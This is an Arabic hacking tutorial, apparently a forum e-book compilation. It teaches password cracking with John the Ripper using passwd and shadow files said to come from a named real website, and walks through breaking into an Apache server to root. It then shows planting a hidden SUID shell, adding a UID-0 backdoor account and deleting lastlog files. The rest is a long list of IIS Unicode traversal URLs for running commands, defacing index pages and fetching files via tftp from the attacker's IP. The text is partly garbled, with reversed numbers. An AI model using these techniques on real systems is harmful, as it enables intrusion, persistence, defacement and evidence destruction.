‫تنزيل ? ‪ Crack 5a‬وأفضل ‪ john the ripper‬لمن يريد إستخدام ويندوز ?‪ ‬‬ ‫وللمعولمیه فإن ‪ john the ripper‬عمل أيضا تحت لیونكس ‪ .....‬‬ ‫طريقه عمل ھذه البرامج ‪ :-‬‬ ‫يقدم للبرنامج ‪ wordlist‬ويقوم بمطابقه الكلمات الموجوده به ? كما ھو موضح‪ ‬‬ ‫ھنا ‪ .‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫‪ ­­­­­­< ­­­­­­­­­­ \ Q2wrtUo9LPq2R‬‬ ‫‪ 372‬‬ ‫يتم مقارنه} ‪ | // >---‬البدايه} كلمة المرور ‪ | /---/‬المشفره مع | ‪ / 1 /‬أخذ‪ ‬‬ ‫كلمة من الـ ‪ wordlist‬الكلمات | ‪ / _____________ 0 /‬المختاره حتى |‪ ‬‬ ‫{تشفیر}‪ | | / 1 /‬يتم ‪ / \­­­­| word list | 0 / ---------^--------‬التطابق‪ ‬‬ ‫> ‪ Q6LiJ6ct1oUBz‬كلمة مرور مشفره ‪ /---/‬الكلمة المختاره |‪ ‬‬‫\ ‪|_____________| ­­­­­­­­­­­­­­­­­­ //­­­­­­­­song------‬إذا حدث تطابق‪ ‬‬ ‫فھذا يعني أن‪ ‬‬ ‫كلمة المرور التي كانت مشفره‪ ‬‬ ‫قد كسرت ‪ ..‬‬ ‫|‪ | ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫ملحظه مھ مه ‪ -:‬يتم عمل دوره مثل الموضحه في العلى لكسر كلمات المرور‬ ‫المشفره بسرعه‪ ‬‬ ‫}النھايه} | ‪ 0005‬تجربه في الثانیه (إختبرنا‪john the ripper‬على معالج بسرعه‬ ‫)‪ 007 ‬‬ ‫|‪ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫لتشغیل ‪ john the ripper‬من واجه دوس نكتب المر التالي‪ ‬‬ ‫‪ john ­ordlist passwd‬‬ ‫حیث ‪ wordlist‬ھو ملف القاموس الذي يحتوي على عدد كبیر من الكلمات‪ ‬‬ ‫و ‪ passwd‬ھو الملف الذي يحتوي على كلمات المرور المشفره والتي نود‪ ‬‬ ‫معرفتھا‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫‪ 89 Microsoft® Windows‬‬ ‫‪ (.8991­1891 C)Copyright Microsoft Corp‬‬ ‫‪ E:\Desktop\junk\john the ripper>john ­wasswd passwd.txt‬‬ ‫‪ 6991 © by Sola 97,John the Ripper Version 1.3 Copyright‬‬ ‫‪ Loaded 1 password‬‬ ‫‪ **v: 0 c: 6401 t: 0:00:00:01 99% c/s: 6401 w: *****DONE‬‬ ‫‪ 472‬‬ ‫‪ >E:\Desktop\junk\john the ripper‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫وسوف تحفظ النتیجه في الملف ‪ john.pot‬الموجود في نفس الدايروكتري ?‪ ‬‬ ‫وعلیك حذف ھ ذا الملف إذا أردت البدء في عملیه كسر جديده ويمكنك تغییر‪ ‬‬ ‫إسمه أو نقله في مكان آخر بدل من حذفه إذا كنت ترى ذلك ‪ ...‬‬ ‫ھناك طريقه اخرى للكسر وھي تسمى بـ ‪ brute force‬أو بالعربي القوه‪ ‬‬ ‫العنیفه ? وھي ل تحتاج لملف ? ‪ wordlist‬ھي تقوم بتجربه كل الحروف والرقام‬ ‫والرموز مع بعض في خانتان ?‪3‬خانات واربع وخمس ‪..‬الخ حتى تصیب كلمة‪ ‬‬ ‫المرور الصحیحه ? وأنا افضل ان تستخدم ملفات ‪ wordlist‬فذلك لن يأخذ معك‪ ‬‬ ‫في ال ثواني فقط لن عملیه التجربه الموضحه في الرسم بالعلى ذكرت بأنه‪ ‬‬ ‫سرعة تجربه الكلمات يتجاوز ‪ 0005‬كلمة في الثانیه ? إذا لم تفلح ملفات‪ ‬‬ ‫‪wordlist‬حینھا إذھب الى القوه العنیفه ‪ brute force‬‬ ‫المر التالي يجعل ‪ john the ripper‬يستخدم طريقه ‪ brute force‬السابق‪ ‬‬ ‫ذكرھا‪ ‬‬ ‫‪ john ­i passwd‬‬


‫حیث ‪ passwd‬ھ و ملف كلمة المرور المراد كسره ? إذا قمت بتجربه ھذه‪ ‬‬ ‫الطريقه إضغط إنتر أثناء عمل البرنامج لترى الى أين توصل ‪ ...‬‬ ‫ولو كان ملف كلمة المرور مضلل ? ماذا علي ان أعمل ?‪ ‬‬‫~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~‬ ‫~‪ ‬‬ ‫دائما سوف تواجه كلمة مرور مضلله ? لكن ھناك طريقه تسمى ‪ Unshadow‬‬ ‫لحل ھذه المشكله !!‪ ‬‬ ‫إذا واجھ ت ملف مضلل علیك البحث عن ملف ثاني يسمى ملف الشادو (ملف‪ ‬‬ ‫الظل ‪ ) shadow file‬‬ ‫وھ ذا الملف يوجد في امكنه معینه وكل نظام تشغیل له مكان يوضع به ھذا‪ ‬‬ ‫الملف ? الیك الجدول التالي ‪ :‬‬ ‫‪ 572‬‬ ‫*‪ Linux : /etc/shadow token = ‬‬ ‫=‪SunOS : /etc/shadow token ‬يأخذ أشكال متعدده اشھرھا ھو‪ * ‬‬ ‫*‪FreeBSD : /etc/master.passwd or /etc/shadow token = ‬والجديد ھو‪ x ‬‬ ‫‪ IRIX : /etc/shadow token = x‬‬ ‫!‪ AIX : /etc/security/passwd token = ‬‬ ‫*‪ ConvexOS : /etc/shadow or /etc/shadpw token = ‬‬ ‫‪token‬تعني الرمز الذي يوجد في الملف‪ passwd ? ‬وھذا يفید في تسھیل‪ ‬‬ ‫المھ مه ? يعني لو مثل لقیت علمه ! بدل كلمه المرور فھذا يعني ان كلمة‪ ‬‬ ‫المرور مسجله في‪ /etc/security/passwd ? ‬لقد إستعنت بالجدول السابق‪ ‬‬ ‫ذكره ? مثال على ملف شادو (أكرر ملف شادو ھ و الملف الذي تخزن فیه كلمة‪ ‬‬ ‫المرور الصحیحه‪ ( ‬‬ ‫ھذا ملف‪ shadow ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::‬‬ ‫‪adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::‬‬ ‫‪ lp:NP:6445::::::‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪ ‬‬ ‫نلحظ ان كلمات السر موجوده‪ ‬‬ ‫الخطوه الخیره وھي دمج ملف الباسورد‪ passwd file ‬مع‪ shadow passwd ‬‬ ‫لنحصل على ملف متكامل ونقدمه الى برامج الكسر السابق ذكرھا‪ ... ‬‬ ‫ھذا ملف باسورد حصلنا علیه من‪ ‬‬ ‫‪ http://wilsonweb2.hwwilson.com/etc/passwd‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ root:x:0:1:Super­User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:‬‬ ‫‪ sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer‬‬ ‫‪Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp‬‬ ‫‪ Admin:/usr/lib/uucp: nuucp:x:9:9:uucp‬‬ ‫‪ 276‬‬ ‫‪ Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico‬‬ ‫‪ listen:x:37:4:Network Admin:/usr/net/nls:‬‬ ‫‪nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access‬‬ ‫‪ User:/: nobody4:x:65534:65534:SunOS 4.x Nobody:/:‬‬ ‫‪ www:x:102:1001::/web:/bin/csh‬‬ ‫‪ mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu‬‬ ‫‪ sid:x:103:10::/export/home/sid:/bin/ksh‬‬


‫‪ mirror:x:104:1::/home/mirror:/bin/sh‬‬ ‫‪ admin:x:105:1::/home/admin:/bin/sh‬‬ ‫‪ jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh‬‬ ‫‪ landmark:x:1000:1000::/web/landmark:/bin/ksh‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪ ‬‬ ‫ومن الـ‪ token ‬الموضح واللي ھو‪ x ‬نعرف من خلل الجدول السابق ذكره بأن‪ ‬‬ ‫كلمة المرور الصحیحه في الدلیل‪ /etc/shadow ‬‬ ‫إذن نتوجه بالمتصفح الى‪ ‬‬ ‫‪ http://wilsonweb2.hwwilson.com/etc/shadow‬‬ ‫لنحصل على الملف‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::‬‬ ‫‪bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445::::::‬‬ ‫‪ smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445::::::‬‬ ‫‪ listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445::::::‬‬ ‫‪ nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507::::::‬‬ ‫‪ mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::‬‬ ‫‪ mirror:iMPWwbrU.gB4k:10601::::::‬‬ ‫‪ admin:hDhB5YYKyWgQw:10976::::::‬‬ ‫‪ jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982::::::‬‬ ‫‪ landmark:0jCgWu6vl8g0s:11185::::::‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‬ ‫­­­­­­­­­­‪ ‬‬ ‫‪ 277‬‬ ‫نقوم بنسخ كلمات السر الموجوده فیه ولصقھا مكان علمه ‪ x‬في ملف‪ ‬‬ ‫الباسورد ? وھ كذا مع جمیع الحسابات لنحصل على ملف كلمة مرور كامل‬ ‫ومتكامل ونقدمه الى برامج الكسر‪ ...‬‬ ‫‪ 872‬‬ ‫كیفیة الختراق (الجزء الول)‪ ‬‬ ‫للكاتب‪ mr_Shark96 :‬‬ ‫اول الموضوع ھ و كیفیة اختراق المواقع بطريقة عامة وقد قمت بجعل الموضوع‬ ‫قسمین‪ ‬‬ ‫الول ‪ :‬كیفیة اختراق سیرفرا ‪ Apache‬‬ ‫الثاني ‪ :‬كیفیة اختراق سیرفرات ‪IIS‬التى تعمل تحت انظمة ‪ Windows‬‬ ‫والن ساتطرق الى الجزء الول وھ و كیفیة اختراق سیرفرات ‪ Apache‬‬ ‫_____________________________________________________‪ ‬‬ ‫الحتايجات‪ :‬‬ ‫‪ -1‬نظام ‪Linux‬او شیل اكاونت او برنامج ‪ Cygwin‬‬ ‫‪ -2‬برنامج ‪ nmap‬‬ ‫‪ -3‬برنامج ‪ netcat‬‬ ‫____________________________________________________‪ ‬‬ ‫عندما تريد اختراق موقع ولیكن ‪ WWW.MSN.COM‬وعند الذھاب الى موقع‪ ‬‬ ‫‪ www.netcraft.com‬لمعرف ‪ IP‬ونظام التشغیل وبعض المعلومات الخرى‪ ‬‬ ‫نجد التي‪ ‬‬ ‫‪ -1‬نظام التشغیل ‪ Linux:‬‬ ‫‪ 2­ 160.8.8.1 : IP‬‬ ‫‪ -3‬سیرفر ‪ Apache :‬‬ ‫طیب نعمل ايه‪ ‬‬


nmap ‫ نقوم بعمل سكان بــ‬: ‫اول‬ nmap ‫كیفیة تنزيل‬ 1­ tar zxvf nmap.tar.gz 2­ cd nmap 3­ make install&&make&&configure 972 man nmap ‫اذا اردت معلومات عمن البرنامج اكتب‬ scan ‫الن سنقوم بعمل‬ Nmap –sT –O –vv 160.8.8.1 ‫ستظھر معلومات مشابھة‬ Starting nmap V. 3.00 ( www.insecure.org/nmap/ ) Host localhost.localdomain (160.8.8.1) appears to be up ... good. Initiating Connect() Scan against localhost.localdomain (160.8.8.1) Adding open port 23/tcp Adding open port 6000/tcp Adding open port 22/tcp Adding open port 1027/tcp Adding open port 111/tcp The Connect() Scan took 1 second to scan 1601 ports. For OSScan assuming that port 22 is open and port 1 is closed and neither are firewalled Interesting ports on localhost.localdomain (127.0.0.1): (The 1596 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 23/tcp open telnet 111/tcp open sunrpc 25/tcp open smtp 6000/tcp open X11 Remote operating system guess: Linux Kernel 2.4.0 ­ 2.5.20 OS Fingerprint: TSeq(Class=RI%gcd=1%SI=26D8DB%IPID=Z%TS=100HZ) T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW ) T2(Resp=N) 280 T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW ) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RI PCK=E%UCK=E%ULEN=134%DAT=E) Uptime 0.007 days (since Sat Oct 5 01:12:31 2002) TCP Sequence Prediction: Class=random positive increments Difficulty=2545883 (Good luck!) TCP ISN Seq. Numbers: CF9FF245 CF78E942 CFD91AAE D0406C91 D0535F65 D05E00C1 IPID Sequence Generation: All zeros


‫‪ Nmap run completed ­­ 1 IP address (1 host up) scanned in 5 seconds‬‬ ‫شرح ماھو مكتوب‪ :‬‬ ‫اول المر‪ : ‬‬ ‫‪ -sT‬يحدد‪ TCP ‬كوسیلة للفحص وھي السھل والكثر انتشارا بیت‪ ‬‬ ‫المخترقین لنھا ل تحتاج صلحیات‪ ‬‬ ‫‪ -O‬لتحديد نظان التشغیل‪ ‬‬ ‫‪ -vv‬لعرض معلومات عن العملیات التي يقوم بھ ا البرنامج وتكتب مرتین لزيادة‪ ‬‬ ‫كثافة المعلومات‪ ‬‬ ‫ثانیا مخرجات البرنامج‪ : ‬‬ ‫يخبرنا البرنامج بوجود بورتات مفتوحة‪ ‬‬ ‫ولكن مانريده ھو‪ smtp ‬ورقم البورت‪ 25 ‬‬ ‫الن سنقوم بالتصال بالموقع عن طريق‪ smtp ‬‬ ‫سنقوم بكتابة‪ ‬‬ ‫‪ 281‬‬ ‫‪ telnet 160.8.8.1 25‬‬ ‫ستظھر معلومات مشابھة للتي‪ ‬‬ ‫‪ Connected to 160.8.8.1‬‬ ‫‪ Escape character is‬‬ ‫‪160.8.8.1 ESMTP send mail 9.10.0/9.6.3:linux 24 jun 2005 04:09:18 ­0‬‬ ‫‪ (EDT) 40‬‬ ‫‪ quit‬‬ ‫‪ 160.8.8.1 closing connecting‬‬ ‫‪ connentin closed by foreigen host‬‬ ‫تفسیر المكتوب‪ :‬‬ ‫ان‪ Smtp ‬اصدارة‪ 9.10.0/9.6.3 ‬‬ ‫ماذا افعل الن‪ ‬‬ ‫البحث عن اكسبلويت عن ھذه الصدارة‪ ‬‬ ‫اول الكسبلةويت ‪ :‬ھو برنامج مكتوب بلغة‪ c ‬او‪C++ ‬او‪ perl ‬‬ ‫كیفیة الحصول على اكسبلويت‪ :‬عن طريق موقع‪ securityfocus.com ‬‬ ‫او‪ securiteam.com‬‬ ‫كل ماعلیك ھ و كتابة الثغرة المراد الدخول منھا ونظام التشغیل‪ ‬‬ ‫‪ Ok‬‬ ‫طلعلنا واحد ولیك‪ Smtp.c ‬‬ ‫دلوقتي نريد رفع الكسبلوبت للموقع للحصول على صلحیات روت‪ ‬‬ ‫عن طريق المر‪ ‬‬ ‫‪ root@IcEr:~/# smtp ­t ­s 0 196.1.2.3‬‬ ‫ھتطلعلك حاجات زي دي‪ ‬‬ ‫‪rpm RedHat 6.2 (?) with smtp from :<shellcode>/ ftp160.8.8.1Target:‬‬ ‫‪ Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode:‬‬ ‫‪ 152‬‬ ‫‪ ..loggin into system‬‬ ‫‪ USER ftp‬‬ ‫‪ .Guest login ok, send your complete e­mail address as password 331‬‬ ‫‪ 282‬‬ ‫‪ <shellcode> PASS‬‬ ‫‪ Next time please use your e­mail address as your password­230‬‬ ‫‪ for example: mega@egypt.com ­230‬‬ ‫‪ .Guest login ok, access restrictions apply 230‬‬ ‫‪ STEP 2 : Skipping, magic number already exists:‬‬ ‫‪ [[87,01:03,02:01,01:02,04‬‬


‫‪STEP 3 : Checking if we can reach our return address by format string‬‬ ‫‪ STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me‬‬ ‫‪ (now‬‬ ‫‪ .STEP 5 : Sending code.. this will take about 10 seconds‬‬ ‫‪ Press ^\ to leave shell‬‬ ‫‪ Linux lame_box.za.net 2.2.14­5.0 #1 Tue Mar 7 21:07:39 EST 2000‬‬ ‫‪ i686 unknown‬‬ ‫‪ (uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp‬‬ ‫‪ !Bang! You have root‬‬ ‫طیب كیفیة تشغیل الملف‪ :‬‬ ‫عن طريق عمل كمبايل للملف بالمر‪ ‬‬ ‫‪ gcc smtp.c –o smtp‬‬ ‫‪ ./smtp‬‬ ‫طبعا لكل اكسبلويت ممكن يختلف عن اخر في عمل كومبايل‪ ‬‬ ‫كیفیة معرفة امر الكومبايل‪ ‬‬ ‫بالمر‪ ./smtp ‬‬ ‫ستظھر كافة المعلومات التي ستاحتاجھا لرفع الملف وعمل كومبايل له‪ ‬‬ ‫دلوقتي عايزيت نعرف وضعنا على السیرفر‪ ‬‬ ‫عن طريق المر‪ whoami $ ‬‬ ‫‪ Root‬‬ ‫وضعنا طلع رووت يعني مدير النظام وممكن نتحكم في السیبرفبر زي مااحنا‪ ‬‬ ‫عاوزيت وممكن تمسح الصفحة الساسیة‪ ‬‬ ‫‪ 283‬‬ ‫ولكن ممكن لو عملت ‪ exit‬وندخل تاني ھ نحتاج نعمل الخطوات اللى فاتت‬ ‫بس فیه طريقة تانیه تديني شیل اكاونت على السیرفیر ده‪ ‬‬ ‫عن طريق اضافة ‪ User‬وعمل له صلحیات ‪ root‬‬ ‫اول نسخ ملف ‪ bin/sh‬‬ ‫بكتابة‪ ‬‬ ‫‪ Cp /bin/sh /dev/nul‬‬ ‫لن يشعر الدمین بنسخ الملف لوجود ملفات بھذا السم‪ ‬‬ ‫بعد كده نكتب‪ ‬‬ ‫‪ Cd /dev‬‬ ‫‪ Chown root nul‬‬ ‫ونعطیله صلحیات ‪ suid‬وھي ‪ 5774‬‬ ‫عن طريق المر‪ ‬‬ ‫‪ Chmod 4775 nul‬‬ ‫كیفیة اضافة ‪ user :‬‬ ‫استعمل محرر النصوص ‪ vi‬‬ ‫‪ Vi /etc/passwd‬‬ ‫دلوقتي دخلنا الى ملف باسور النظام والملف بیكون بالشكل ده‪ ‬‬ ‫‪ User:password:uid:gid:startdir:shell‬‬ ‫في حالة ‪super user‬يكون ‪ uid‬و ‪ 0 = gid‬‬ ‫ھنضیف السطر ده‪ ‬‬ ‫‪ Mega::0:0:mega:/:bin/sh‬‬ ‫طبعا انت كده روووووووووووووووووووت‪ ‬‬ ‫الھ م في الموضوع ازالة اثار دخولك للسیرفر عن طريق مسح ھذه الملفات‬ ‫‪ /Var/log/lastlog‬‬ ‫‪ /Usr/adm/lastlog‬‬ ‫‪ /Var/adm/lastlog‬‬ ‫ومحھا عن طريق المر ‪ lled‬‬


‫ لرفع الكسبلويت او اي اداة‬ftp ‫ لمن يستخدمون‬wted ‫او بالمر‬ 482 ‫طبعا دي اساسیات مش اكتر‬ 582 (‫اختراق المواقع (الجزء الثاني‬ Mega Egypt:‫للكاتب‬ ‫ التي تعمل تحت انظمة‬IIS ‫الن ساتطرق الى شرح كیفیة اختراق سیرفرات‬ Unicode ‫ وھي ثغرات الیونیكود‬Windows ‫وسوف نتحدث عنھا قلیل‬ ‫ وھذه الثغرة‬1002 ‫ مايو سنة‬51 ‫ في‬NSFOCUS ‫اكتشفت الیونیكود بواسطة‬ Windows ‫ وتعمل تحت انظمة‬IIS 4.0 & IIS 5.0 ‫تكون موجوده في سیرفرات‬ ‫ھذه الثغرة تمكن المخترق من ادخال الوامر بالقوة نظرا لصلحیته المسموح‬ ‫بھا‬ ‫لكني لن اتطرق الى شرحھ ا برمجیا نظرا لطول الموضوع وقد كتب عنھا طكثییر‬ ‫من قبلي‬ ‫ولكني ساتحدث عن كیفیة استغلل ھذه الثغرات‬ ‫ماھي ثغرا الیونیكود‬ http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c \:+dir+c http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c \:c+ +dir / msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/syst 286 \:em32/cmd.exe?/c+dir+c / MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+ \:dir+c / MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe \:?/c+dir+c / MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/syst \:em32/cmd.exe?/c+dir+c / MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63 \:winnt/system32/cmd.exe?/c+dir+c _/ vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cm \:d.exe?/c+dir+c


_/ vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system3 \:2/cmd.exe?/c+dir+c _/ vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%6 \:3../winnt/system32/cmd.exe?/c+dir+c _/ vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63.. \:%25%35%63../winnt/system32/cmd.exe?/c+dir+c PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/ \: / PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir \:+c / PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd. \:exe?/c+dir+c / 287 PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system3 \:2/cmd.exe?/c+dir+c \:Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/ \:Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c/ / Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/ \:c+dir+c / Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm \:d.exe?/c+dir+c _/ vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cm \:d.exe?/c+dir+c _/ vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system3 \:2/cmd.exe?/c+dir+c _/ vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%6 \:3../winnt/system32/cmd.exe?/c+dir+c _/ vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63.. \:%25%35%63../winnt/system32/cmd.exe?/c+dir+c / samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/syste \:m32/cmd.exe?/c+dir+c cgi­/ bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/ \:cmd.exe?/c+dir+c / iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/syste \:m32/cmd.exe?/c+dir+c


_/ vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system \:32/cmd.exe?/c+dir+c 288 / adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/sys \:tem32/cmd.exe?/c+dir+c / scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cm \:d.exe?/c+dir+c / scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cm \:d.exe?/c+dir+c / scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cm \:d.exe?/c+dir+c / scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+di \:r+c \:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/ \:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/ / msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/ \:c+dir+c _/ vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/ \:c+dir+c ‫ باسم الموقع المرا اختراقه‬xxx ‫يتم ذلك باستبدال‬ ‫طبعا دي مش كل الثغرات انما جزء بسیط جدا‬ ‫فثغرات الیونیكود ل يمكن حصرھا وكل ثغرة يتم غلقھا يخرج بدل منھا مئات‬ 289 cmd.exe ‫ عن طريق برنامج‬Explorer ‫يتم تنفیذ الومر عن طريق المتصفح‬ index ‫والن ساتحدث عن بعض الوامر التي ستحتاجھا لتغییر‬ ‫قراءة ملف‬ http://www.xxxx.com/_vti_bin %../ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:\index.htm ‫حذف ملف‬ http://www.xxxx.com/_vti_bin %../ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\inetpub\ww wroot\index.asp ‫الكتابة في ملف‬ http://www.xxxx.com/_vti_bin


%../ +c0%af../..%c0%af../winnt/system32/cmd.exe?/c+echo+xxxxxxxxxxx c:\xx.txt+< ‫لتغیر اسم ملف‬ http://www.xxxx.com/_vti_bin %../ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+ren+c:\xxxxx.htm ‫نسخ ملف‬ http://www.xxxx.com/_vti_bin %../ 290 c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\syste m32\cmd.exe+c:\inetpub\scripts\DJ.exe Folder ‫انشاء‬ http://www.xxxx.com/_vti_bin c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\xxxx%../ Folder ‫حذف‬ http://www.xxxx.com/_vti_bin ‫الن‬c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+c:\xxx%../ ‫وھو الھم‬ Index ‫كیفیه تغییر الصفحة الرئیسیة‬ ‫لھا طريقتین‬ ‫ رفع ملف الى الموقع‬-1 ‫ الكتابة داخل الضفحة الساسیة للموقع‬-2 ‫شرح الطريقة الولى‬ tFTP ‫ ولیكن‬FTP ‫وستكون بواسطة اي برنامج‬ c ‫قم بتنصیب البرنامج في‬ c ‫قم بوضح الصفحة المراد رفعھا في‬ ‫ونفذ المر التي‬ http://www.xxxx.com/_vti_bin c0%af../..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+"­%../ i"+127.0.0.1+GET+index.htm+C:\inetpub\wwwroot\index.htm ‫مع ملحظة التي‬ ‫ الى اي بي بتاعك‬1.0.0.721 ‫ تغیر‬-1 ‫ ھ و البرنامج لخاص برفع الملف ويمكن تغیره حسب البرناج‬tFTP ­2 ‫المستخدم‬ 291 ‫شرح الطريقة الثانیة‬ ‫ مستخدما المر‬script ‫ الى مجلد‬cdm.exe ‫وستكون بنسخ ملف‬ http://www.xxxx.com/_vti_bin %../ c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\syste m32\cmd.exe+c:\inetpub\scripts\xx.exe ‫وبعد ذلك يمكنك رؤية الموقع من ھذه الثغرة‬ 